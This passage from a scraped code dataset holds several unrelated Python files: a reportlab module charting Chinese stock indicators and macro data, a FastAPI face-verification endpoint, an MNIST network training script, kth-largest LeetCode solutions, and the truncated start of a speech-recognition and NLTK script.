bc.bars[i].fillColor = colors.red\n\n # x_min = data[0][0]\n # x_max = data[-1][0]\n\n # bc.xValueAxis.valueMin = x_min\n # lp.xValueAxis.valueMax = x_max\n\n # step = int(((x_max - x_min) / (60 * 60 * 24)) / 15) + 1\n\n # bc.categoryAxis.categoryNames = [str(Sec2Datetime(x))[0:10] for x in range(int(x_min), int(x_max), 60 * 60 * 24 * step)]\n\n drawing.add(bc)\n\n # 增加legend\n # add_legend(drawing, bc, pos_x=10, pos_y=-10)\n\n return drawing\n\n\ndef RPL_Bk_Page(canvas_para,bk_name):\n \"\"\"\n 函数功能:在pdf中增加bk信息,篇幅为一整页,或者更多,以页为单位\n :param bk_name:\n :param days: 用于指示近期的期限,比如近30天\n :return:\n \"\"\"\n\n\n # 插入字符串,用以表明stk代码及名称\n canvas_para.setFont(\"song\", 10)\n if bk_name in ['sh','sz','cyb']:\n stk_name = bk_name\n\n else:\n stk_name = stk_basic[stk_basic.index==bk_name]['name'].values[0]\n\n canvas_para.drawString(20, letter[1] - 10, bk_name + stk_name)\n\n\n\n sh_index = ts.get_hist_data(bk_name)\n sh_index['date'] = sh_index.index\n sh_index = sh_index.reset_index(drop=True)\n\n\n # 按时间降序排序,方便计算macd\n sh_index = sh_index.sort_values(by='date',ascending=True)\n\n # 在原始df中增加macd信息\n sh_index['MACD'],sh_index['MACDsignal'],sh_index['MACDhist'] = talib.MACD(sh_index.close,\n fastperiod=12, slowperiod=26, signalperiod=9)\n\n # 在原始数据中增加kdj信息\n sh_index['slowk'], sh_index['slowd'] = talib.STOCH(sh_index.high,\n sh_index.low,\n sh_index.close,\n fastk_period=9,\n slowk_period=3,\n slowk_matype=0,\n slowd_period=3,\n slowd_matype=0)\n\n\n # 添加rsi信息\n sh_index['RSI5'] = talib.RSI(sh_index.close, timeperiod=5)\n sh_index['RSI12'] = talib.RSI(sh_index.close, timeperiod=12)\n sh_index['RSI30'] = talib.RSI(sh_index.close, timeperiod=30)\n\n\n # 在原始数据中加入布林线\n sh_index['upper'], sh_index['middle'], sh_index['lower'] = talib.BBANDS(\n sh_index.close,\n timeperiod=20,\n # number of non-biased standard deviations from the mean\n nbdevup=2,\n nbdevdn=2,\n # Moving average type: simple moving average here\n matype=0)\n\n\n sh_index = sh_index.dropna(axis=0,how='any')\n\n close = ExtractPointFromDf_DateX(sh_index, 'date', 'close')\n m5 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma5')\n m10 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma10')\n m20 = ExtractPointFromDf_DateX(sh_index, 'date', 'ma20')\n\n macd = ExtractPointFromDf_DateX(sh_index, 'date', 'MACD')\n\n data = [tuple(close),tuple(m5),tuple(m10),tuple(m20)]\n data_name = ['close','m5','m10','m20']\n\n drawing_ave = genLPDrawing(data=data, data_note=data_name,height=letter[1]*0.15)\n renderPDF.draw(drawing=drawing_ave, canvas=canvas_para, x=10, y=letter[1] * 0.8)\n\n drawing_macd = genBarDrawing(data=macd, data_note=['macd'])\n renderPDF.draw(drawing=drawing_macd, canvas=canvas_para, x=10, y=letter[1]*0.6)\n\n\n # 整理kdj信息\n slowk = ExtractPointFromDf_DateX(sh_index, 'date', 'slowk')\n slowd = ExtractPointFromDf_DateX(sh_index, 'date', 'slowd')\n data_kdj = [tuple(slowk),tuple(slowd)]\n data_kdj_note = ['k','d']\n\n drawing_kdj = genLPDrawing(data=data_kdj, data_note=data_kdj_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_kdj, canvas=canvas_para, x=10, y=letter[1] * 0.5)\n\n # 画图RSI信息\n RSI5 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI5')\n RSI12 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI12')\n RSI30 = ExtractPointFromDf_DateX(sh_index, 'date', 'RSI30')\n\n data_RSI = [tuple(RSI5),tuple(RSI12),tuple(RSI30)]\n data_RSI_note = ['RSI5','RSI12','RSI30']\n\n drawing_RSI = genLPDrawing(data=data_RSI, data_note=data_RSI_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_RSI, canvas=canvas_para, x=10, y=letter[1] * 0.3)\n\n\n # 画图布林线\n upper = ExtractPointFromDf_DateX(sh_index, 'date', 'upper')\n middle = ExtractPointFromDf_DateX(sh_index, 'date', 'middle')\n lower = ExtractPointFromDf_DateX(sh_index, 'date', 'lower')\n\n data_BOLL = [tuple(upper),tuple(middle),tuple(lower)]\n data_BOLL_note = ['上线','中线','下线']\n\n drawing_BOLL = genLPDrawing(data=data_BOLL, data_note=data_BOLL_note,height=letter[1]*0.1)\n renderPDF.draw(drawing=drawing_BOLL, canvas=canvas_para, x=10, y=letter[1] * 0.1)\n\n canvas_para.showPage()\n\n return canvas_para\n\n\ndef addMoneySupplyPage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加货币供应页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '货币供应')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n\n # 画货币供应量\n money_supply = ts.get_money_supply().replace('--',nan)\n money_supply['date'] = money_supply.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 画货币量曲线图\n m0 = ExtractPointFromDf_DateX(money_supply, 'date', 'm0')\n m1 = ExtractPointFromDf_DateX(money_supply, 'date', 'm1')\n m2 = ExtractPointFromDf_DateX(money_supply, 'date', 'm2')\n\n data_supply = [tuple(m0), tuple(m1), tuple(m2)]\n data_supply_note = ['m0', 'm1', 'm2']\n\n money_drawing = genLPDrawing(data=data_supply, data_note=data_supply_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n # 画货币量增长率曲线图\n m0_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm0_yoy')\n m1_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm1_yoy')\n m2_yoy = ExtractPointFromDf_DateX(money_supply, 'date', 'm2_yoy')\n\n data_supply_yoy = [tuple(m0_yoy), tuple(m1_yoy), tuple(m2_yoy)]\n data_supply_yoy_note = ['m0增长率', 'm1增长率', 'm2增长率']\n\n money_yoy_drawing = genLPDrawing(data=data_supply_yoy, data_note=data_supply_yoy_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_yoy_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n c.showPage()\n\n return c\n\n\ndef addReserveBaseRatePage(canvas_para):\n \"\"\"\n 函数功能:在pdf中增加准备金基率\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n c.setFont(\"song\", 10)\n c.drawString(10, letter[1] - 20, '存款准备金基率')\n c.setLineWidth(3)\n c.line(10, letter[1] - 24, letter[0] - 10, letter[1] - 24)\n\n # 画银行准备金基率\n df_rbr = ts.get_rrr().replace('--', nan)\n # df_rbr['date'] = df_rbr.apply(lambda x: stdMonthDate2ISO(x['month']), axis=1)\n\n # 提取相关数据\n pot_before = ExtractPointFromDf_DateX(df_rbr, 'date', 'before')\n pot_now = ExtractPointFromDf_DateX(df_rbr, 'date', 'now')\n pot_changed = ExtractPointFromDf_DateX(df_rbr, 'date', 'changed')\n\n data_rbr = [tuple(pot_now)]\n data_rbr_note = ['准备金基率']\n\n money_drawing = genLPDrawing(data=data_rbr, data_note=data_rbr_note, height=letter[1] * 0.2)\n renderPDF.draw(drawing=money_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n c.showPage()\n\n return c\n\n\ndef addQuarterGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:增加季度GDP页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_quarter = ts.get_gdp_quarter()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='gdp_yoy', timeAxis='quarter')\n pi_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='pi_yoy', timeAxis='quarter')\n si_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='si_yoy', timeAxis='quarter')\n\n ti_yoy = ExtractPointFromDf_DateX(df_origin=gdp_quarter, date_col='quarter', y_col='ti_yoy', timeAxis='quarter')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi_yoy),tuple(si_yoy),tuple(ti_yoy)],\n data_note=['GDP同比增长率','第一产业增长率','第二产业增长率','第三产业增长率'],\n timeAxis='quarter')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addDemandsForGDPPage(canvas_para):\n\n \"\"\"\n 函数功能:三大需求对GDP的贡献\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_for = ts.get_gdp_for()\n\n end_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='end_for', timeAxis='year')\n asset_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_for', timeAxis='year')\n goods_for = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_for', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(end_for), tuple(asset_for), tuple(goods_for)], ['最终消费支出贡献率', '资本形成总额贡献率', '货物和服务净出口贡献率'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n for_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='for_rate', timeAxis='year')\n asset_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='asset_rate', timeAxis='year')\n goods_rate = ExtractPointFromDf_DateX(df_origin=gdp_for, date_col='year', y_col='goods_rate', timeAxis='year')\n\n\n gdp_for_drawing = genLPDrawing([tuple(for_rate), tuple(asset_rate), tuple(goods_rate)], ['最终消费支出拉动(百分点)', '资本形成总额拉动(百分点)', '货物和服务净出口拉动(百分点)'], timeAxis='year')\n\n renderPDF.draw(drawing=gdp_for_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addGDPPullPage(canvas_para):\n\n \"\"\"\n 函数功能:展示三个产业对GDP的拉动情况\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n gdp_pull = ts.get_gdp_pull()\n\n gdp_yoy = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='gdp_yoy', timeAxis='year')\n pi = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='pi', timeAxis='year')\n si = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='si', timeAxis='year')\n industry = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='industry', timeAxis='year')\n ti = ExtractPointFromDf_DateX(df_origin=gdp_pull, date_col='year', y_col='ti', timeAxis='year')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(gdp_yoy),tuple(pi),tuple(si),tuple(industry),tuple(ti)],\n data_note=['GDP同比增长率','第一产业拉动率','第二产业拉动率','工业拉动率','第三产业拉动率'],\n timeAxis='year')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addCPIPage(canvas_para, length):\n \"\"\"\n 函数功能:增加CPI页\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n cpi_df = ts.get_cpi()\n cpi_df['month'] = cpi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n cpi_df = cpi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n cpi = ExtractPointFromDf_DateX(df_origin=cpi_df, date_col='month', y_col='cpi', timeAxis='month')\n\n\n gdp_pull_drawing = genLPDrawing([tuple(cpi)],\n data_note=['CPI增长率'],\n timeAxis='month')\n\n renderPDF.draw(drawing=gdp_pull_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n c.showPage()\n\n return c\n\n\ndef addPPIPage(canvas_para, length):\n \"\"\"\n 函数功能:工业品出厂价格指数\n :param canvas_para:\n :return:\n \"\"\"\n\n c = canvas_para\n\n ppi_df = ts.get_ppi()\n ppi_df['month'] = ppi_df.apply(lambda x:stdMonthDate(x['month']), axis=1)\n ppi_df = ppi_df.sort_values(by='month',ascending=False).head(length).sort_values(by='month',ascending=True)\n\n ppiip = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppiip', timeAxis='month')\n ppi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='ppi', timeAxis='month')\n qm = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='qm', timeAxis='month')\n rmi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='rmi', timeAxis='month')\n pi = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='pi', timeAxis='month')\n\n\n ppi_industry_drawing = genLPDrawing([tuple(ppiip), tuple(ppi), tuple(qm), tuple(rmi), tuple(pi)],\n data_note=['工业品出厂价格指数',\n '生产资料价格指数',\n '采掘工业价格指数',\n '原材料工业价格指数',\n '加工工业价格指数'],\n timeAxis='month')\n\n renderPDF.draw(drawing=ppi_industry_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n cg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='cg', timeAxis='month')\n food = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='food', timeAxis='month')\n clothing = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='clothing', timeAxis='month')\n roeu = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='roeu', timeAxis='month')\n dcg = ExtractPointFromDf_DateX(df_origin=ppi_df, date_col='month', y_col='dcg', timeAxis='month')\n\n\n ppi_life_drawing = genLPDrawing([tuple(cg), tuple(food), tuple(clothing), tuple(roeu), tuple(dcg)],\n data_note=['生活资料价格指数',\n '食品类价格指数',\n '衣着类价格指数',\n '一���日用品价格指数',\n '耐用消费品价格指数'],\n timeAxis='month')\n\n renderPDF.draw(drawing=ppi_life_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n c.showPage()\n\n return c\n\n\ndef addShiborPage(canvas_para,year_start='2006',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加银行间拆借利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_shibor_list = []\n for year in year_list:\n shibor_this = ts.shibor_data(year)\n df_shibor_list.append(shibor_this)\n\n df_shibor = pd.concat(df_shibor_list,axis=0).sort_values(by='date', ascending=True)\n\n ON = ExtractPointFromDf_DateX(df_origin=df_shibor,date_col='date',y_col='ON',timeAxis='datetime')\n W1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1W',timeAxis='datetime')\n W2 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='2W',timeAxis='datetime')\n M1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1M',timeAxis='datetime')\n M3 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='3M',timeAxis='datetime')\n M6 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='6M',timeAxis='datetime')\n M9 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='9M',timeAxis='datetime')\n Y1 = ExtractPointFromDf_DateX(df_origin=df_shibor, date_col='date', y_col='1Y',timeAxis='datetime')\n\n shibor_drawing = genLPDrawing([tuple(ON)],data_note=['隔夜拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.85)\n\n shibor_drawing = genLPDrawing([tuple(W1)],data_note=['1周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.7)\n\n shibor_drawing = genLPDrawing([tuple(W2)],data_note=['2周拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.55)\n\n shibor_drawing = genLPDrawing([tuple(M1)],data_note=['1月拆放利率'],timeAxis='day',height=letter[1]*0.1)\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.4)\n\n shibor_drawing = genLPDrawing([tuple(M3),\n tuple(M6),\n tuple(M9),\n tuple(Y1)],\n\n data_note=['3月拆放利率',\n '6月拆放利率',\n '9月拆放利率',\n '1年拆放利率'],\n\n timeAxis='day',height=letter[1]*0.25)\n\n renderPDF.draw(drawing=shibor_drawing, canvas=c, x=10, y=letter[1] * 0.1)\n\n c.showPage()\n return c\n\n\ndef addLprPage(canvas_para,year_start='2013',year_end=str(datetime.datetime.now().year + 1)):\n \"\"\"\n 函数功能:增加贷款利率页\n :param canvas_para:\n :return:\n \"\"\"\n c = canvas_para\n\n date_list = pd.date_range(start=year_start, end=year_end, freq='12M')\n year_list = [str(x)[0:4] for x in date_list]\n\n df_Lpr_list = []\n for year in year_list:\n lpr_this = ts.lpr_data(year)\n df_Lpr_list.append(lpr_this)\n\n df_Lpr = pd.concat(df_Lpr_list, axis=0).sort_values(by='date', ascending=True).drop_duplicates(subset='1Y',keep='first')\n\n Y1 = ExtractPointFromDf_DateX(df_origin=df_Lpr, date_col='date', y_col='1Y', timeAxis='datetime')\n lpr_drawing = genLPDrawing([tuple(Y1)], data_note=['1年贷款基础利率'], timeAxis='day', height=letter[1] * 0.3, y_min_zero=True)\n renderPDF.draw(drawing=lpr_drawing, canvas=c, x=10, y=letter[1] * 0.6)\n\n # 画均值贷款利率\n # df_Lpr_ma_list = []\n # for year in year_list:\n # lpr_ma_this = ts.lpr_ma_data(year)\n # df_Lpr_ma_list.append(lpr_ma_this)\n #\n # df_Lpr_ma = pd.concat(df_Lpr_ma_list, axis=0).sort_values(by='date', ascending=True)\\\n # .drop_duplicates(subset=['1Y_5', '1Y_10', '1Y_20'], keep='first')\\\n # .apply(lambda x:x.replace('---',nan), axis=1)\n #\n # Y1_5 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_5', timeAxis='datetime')\n # Y1_10 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_10', timeAxis='datetime')\n # Y1_20 = ExtractPointFromDf_DateX(df_origin=df_Lpr_ma, date_col='date', y_col='1Y_20', timeAxis='datetime')\n #\n # lpr_ma_drawing = genLPDrawing([tuple(Y1_5),tuple(Y1_10),tuple(Y1_20)],\n # data_note=['1年贷款基础利率-M5','1年贷款基础利率-M10','1年贷款基础利率-M20'],\n # timeAxis='day',\n # height=letter[1] * 0.3)\n #\n # renderPDF.draw(drawing=lpr_ma_drawing, canvas=c, x=10, y=letter[1] * 0.2)\n\n\n c.showPage()\n return c\n\n\ndef addTailPage(canvas_param, pagesize=letter):\n \"\"\"\n 函数功能:为pdf文档添加功能,分“主题”、“副标题”两部分\n :param canvas:\n :param pagesize: 页面大小,默认A4\n :param theme: 主题字符串\n :param subtitle: 副标题字符串\n :return:\n \"\"\"\n PAGE_WIDTH = pagesize[0]\n PAGE_HEIGHT = pagesize[1]\n\n # 设置主标题字体并打印主标题\n canvas_param.setFont(\"song\", 30)\n canvas_param.drawString(20, PAGE_HEIGHT*0.7, '加群:StockReport 825832838')\n\n canvas_param.drawString(20, PAGE_HEIGHT * 0.65, '每日免费获取该文档!')\n\n canvas_param.showPage()\n\n return canvas_param","repo_name":"dxcv/My_Quant","sub_path":"Auto_Report/ReportLab/SubFunction.py","file_name":"SubFunction.py","file_ext":"py","file_size_in_byte":32173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"18861051015","text":"\n\nfrom fastapi import (\n APIRouter,\n UploadFile,\n HTTPException,\n File\n)\nimport socketio\nfrom service.verification import Verification\nfrom datetime import datetime\nfrom domain.model.payload import VerifySessionPayload\n\nverification_api = APIRouter(\n prefix=\"/verification\"\n)\nVerification = Verification()\n\nsio = socketio.AsyncServer(async_mode=\"asgi\")\nsocket_app = socketio.ASGIApp(sio)\n\n@sio.event\ndef connect(sid, environ, auth):\n print('connect ', sid)\n\n@verification_api.get(\"/generate\")\nasync def generate_session():\n \"\"\"\n Generate Session Token.\n\n This will generate TTL token and store on \n\n in-memory database:\n\n * Generate Token.\n * Store Token into redis.\n \"\"\"\n\n session_token = Verification.gennerate_session_code()\n\n return {\n \"issure_at\": datetime.now(),\n \"session_token\": session_token,\n \"expire_at\": int(datetime.timestamp(datetime.utcnow()) * 1000)\n }\n\n\n@verification_api.post(\"/verify-session\")\nasync def verify_session(data: VerifySessionPayload):\n \"\"\"\n Verify Session Token.\n\n This will verify token is existed\n \n in-memory database:\n\n * Verify Token.\n \"\"\"\n token = data.session_token\n session = Verification.verify_session_code(session_code=token)\n \n if not session:\n return {\n \"status\": \"Invalid or Expired token\",\n }\n else:\n return {\n \"status\": \"Verified\",\n }\n sio.emit(f'{token}',\"Verify complete\")\n\n\n@verification_api.post(\"/verify-exist\")\nasync def verify_exist(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify is exist Face Data in DB.\n\n in-memory database:\n\n * Receive face image convert to embedding vector.\n * Check is exist face data in DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submit\")\n else:\n query = await file.read()\n res = Verification.face_recognition(query_face=query)\n return res\n \n\n\n@verification_api.post(\"/register-face\")\nasync def register_face(\n file: UploadFile=File(...),\n):\n \"\"\"\n Verify is exist Face Data in DB.\n\n in-memory database:\n\n * Receive face image convert to embedding vector.\n * Check is exist face data in DB.\n \"\"\"\n \n if not file :\n raise HTTPException(status_code=400, detail=\"No file submit\")\n else:\n query = await file.read()\n try:\n Verification.register_face(query)\n return {\n \"message\":\"face registed\"\n }\n except:\n raise HTTPException(status_code=503, detail=\"Error Register\")\n","repo_name":"pattanunNP/KlarityBackend","sub_path":"controller/verification_controller.py","file_name":"verification_controller.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70447131241","text":"import sys\nimport os\nsys.path.insert(1, os.path.join(sys.path[0], '..'))\n\nimport time\n\nimport data_loader\nfrom network import FullyConnectedFeedforwardNetwork\nfrom network import SimpleFeedforwardNetwork\nimport numpy as np\nimport pickle\n\n\ndef compare_result(predicted, expected):\n predicted_idx = np.argmax(predicted)\n expected_idx = np.argmax(expected)\n #print(\"validating testcase: expected %d, got %d\" % (expected_idx, predicted_idx))\n return predicted_idx == expected_idx\n\ndef validate_network(network, validation_data, max_data_count=None):\n \"\"\"\n max_data_count\n return the failure rate\n \"\"\"\n failure_count = 0\n total_count = 0\n for (vi, vo) in validation_data:\n total_count += 1\n predicted_output = network.GetOutput(vi)\n if (not compare_result(predicted_output, vo)):\n failure_count += 1\n if ((max_data_count is not None) and (total_count > max_data_count)):\n break\n\n result = failure_count / total_count\n return result\n\n\n\nif (__name__ == \"__main__\"):\n layer_sizes = [28*28, 30, 10]\n rho = 0.5 \n batch_size = 10\n max_epoch = 10\n\n use_simple_network = False\n if (len(sys.argv) > 2):\n raise RuntimeError(\"Do not know how to handle the command-line arguments:\\n{}\".format(sys.argv))\n elif (len(sys.argv) > 1):\n use_simple_network = (sys.argv[1] == \"simple\")\n\n if (use_simple_network):\n print(\"testing simple feedforward network\")\n n = SimpleFeedforwardNetwork(layer_sizes)\n else:\n print(\"testing fully connected feedforward network\")\n n = FullyConnectedFeedforwardNetwork(layer_sizes, \"sigmoid\")\n\n # load dataset\n training_data, validation_data, test_data = \\\n data_loader.load_mnist_dataset()\n\n # training\n for iter in range(max_epoch):\n start_time = time.time()\n actual_rho = rho / (iter + 1)\n np.random.shuffle(training_data)\n for k in range(batch_size, len(training_data), batch_size):\n #if (k > 10000):\n # break\n batch = training_data[k-batch_size:k]\n n.Train(batch, rho)\n # run validation data\n error_rate = validate_network(n, validation_data, 100)\n end_time = time.time()\n print(\"epoch %d: %.2fs, error rate %.2f%%\" % (iter, end_time - start_time, 100 * error_rate))\n pickle.dump(n, open(\"network.pkl\", \"wb\"))\n\n","repo_name":"lonelycorn/machine-learning","sub_path":"legacy/test/test_feedforward_network.py","file_name":"test_feedforward_network.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"9466685928","text":"\n\"\"\"\n1985. Find the Kth Largest Integer in the Array\n\nYou are given an array of strings nums and an integer k. Each string in nums represents \nan integer without leading zeros.\n\nReturn the string that represents the kth largest integer in nums.\n\nNote: Duplicate numbers should be counted distinctly. For example, if nums is [\"1\",\"2\",\"2\"], \n\"2\" is the first largest integer, \"2\" is the second-largest integer, and \"1\" is the third-largest integer.\nExample 1:\n\nInput: nums = [\"3\",\"6\",\"7\",\"10\"], k = 4\nOutput: \"3\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"3\",\"6\",\"7\",\"10\"].\nThe 4th largest integer in nums is \"3\".\nExample 2:\n\nInput: nums = [\"2\",\"21\",\"12\",\"1\"], k = 3\nOutput: \"2\"\nExplanation:\nThe numbers in nums sorted in non-decreasing order are [\"1\",\"2\",\"12\",\"21\"].\nThe 3rd largest integer in nums is \"2\".\n\"\"\"\n\n# Approach 1: Sorting\n# Time complexity: O(nlogn)\n# Space complexity: O(1)\ndef kthLargestNumber(self, nums, k):\n for i, num in enumerate(nums):\n nums[i] = int(num)\n nums.sort(reverse = True)\n return str(nums[k-1])\n\n# Approach 2: Using a maxheap\n# Time complexity: O(klogn)\n# Space complexity: O(n)\nimport heapq\ndef findKthLargest(self, nums, k):\n heap = []\n\n for i in range(len(nums)):\n heap.append(-1*int(nums[i]))\n heapq.heapify(heap)\n while k > 0:\n K_largest = -1*(heapq.heappop(heap))\n k -= 1\n return str(K_largest)\n\n# Approach 3: Using Quick select\n# Time complexity: O(n) in the best case, worst case is O(n^2)\n# Space complexity: O(1)\nclass Solution(object):\n def findKthLargest(self, nums, k):\n return self.qs(nums, 0, len(nums)-1, k)\n \n def qs(self, arr, l, r, k):\n p = self.partition(arr, l, r)\n if (k-1) == p:\n return arr[p]\n elif (k-1) > p:\n return self.qs(arr, p + 1, r, k)\n else:\n return self.qs(arr, l, p - 1, k)\n\n def partition(self, arr, l, r):\n pivot = arr[r]\n i = l\n for j in range(l, r):\n if int(arr[j]) > int(pivot):\n arr[i], arr[j] = arr[j], arr[i]\n i += 1\n arr[i], arr[r] = arr[r], arr[i]\n return i\n\n","repo_name":"yonahgraphics/Grokking-Leetcode-Patterns","sub_path":"heaps/Find the Kth Largest Integer in the Array.py","file_name":"Find the Kth Largest Integer in the Array.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"}
+{"seq_id":"73569290599","text":"#from nltk import RegexpParser\r\n#from nltk import tokenize\r\n#from nltk.tree import *\r\n#from tempfile import TemporaryFile\r\nimport nltk\r\n#import os\r\nimport csv\r\nimport pandas as pd\r\n#import itertools\r\nfrom nltk.stem import WordNetLemmatizer\r\nfrom nltk.corpus import stopwords\r\n#from nltk.tokenize import word_tokenize\r\n#from nltk import word_tokenize, pos_tag, ne_chunk\r\n#import numpy as np\r\n#import math\r\n\r\n#Python 2.x program for Speech Recognition\r\n \r\nimport speech_recognition as sr\r\n \r\n#enter the name of usb microphone that you found\r\n#using lsusb\r\n#the following name is only used as an example\r\nmic_name = \"Microphone (High Definition Aud\"\r\n#Sample rate is how often values are recorded\r\nsample_rate = 48000\r\n#Chunk is like a buffer. It stores 2048 samples (bytes of data)\r\n#here. \r\n#it is advisable to use powers of 2 such as 1024 or 2048\r\nchunk_size = 2048\r\n#Initialize the recognizer\r\nr = sr.Recognizer()\r\n \r\n#generate a list of all audio cards/microphones\r\nmic_list = sr.Microphone.list_microphone_names()\r\n \r\n#the following loop aims to set the device ID of the mic that\r\n#we specifically want to use to avoid ambiguity.\r\nfor i, microphone_name in enumerate(mic_list):\r\n if microphone_name ==mic_list[2]:\r\n device_id = 2\r\n \r\n#use the microphone as source for input. Here, we also specify \r\n#which device ID to specifically look for incase the microphone \r\n#is not working, an error will pop up saying \"device_id undefined\"\r\nwith sr.Microphone(device_index = device_id, sample_rate = sample_rate,chunk_size = chunk_size) as source:\r\n #wait for a second to let the recognizer adjust the \r\n #energy threshold based on the surrounding noise level\r\n r.adjust_for_ambient_noise(source)\r\n print (\"Say Something\")\r\n #listens for the user's input\r\n audio = r.listen(source)\r\n \r\n try:\r\n text = r.recognize_google(audio)\r\n print (\"you said:\" + text)\r\n \r\n #error occurs when google could not understand what was said\r\n \r\n except sr.UnknownValueError:\r\n print(\"Google Speech Recognition could not understand audio\")\r\n \r\n except sr.RequestError as e:\r\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\r\n\r\n\r\n\r\n\r\ndef one():\r\n \r\n stop_words = set(stopwords.words('english'))\r\n sent_text = nltk.sent_tokenize(text)\r\n file = open('Text_Without_Stopwords.txt','w') \r\n for sentence in sent_text:\r\n tokenized_text = nltk.word_tokenize(sentence)\r\n filtered_sentence = [w for w in tokenized_text if not w in stop_words]\r\n filtered_sentence = []\r\n temp=\"\"\r\n \r\n for w in tokenized_text:\r\n if w not in 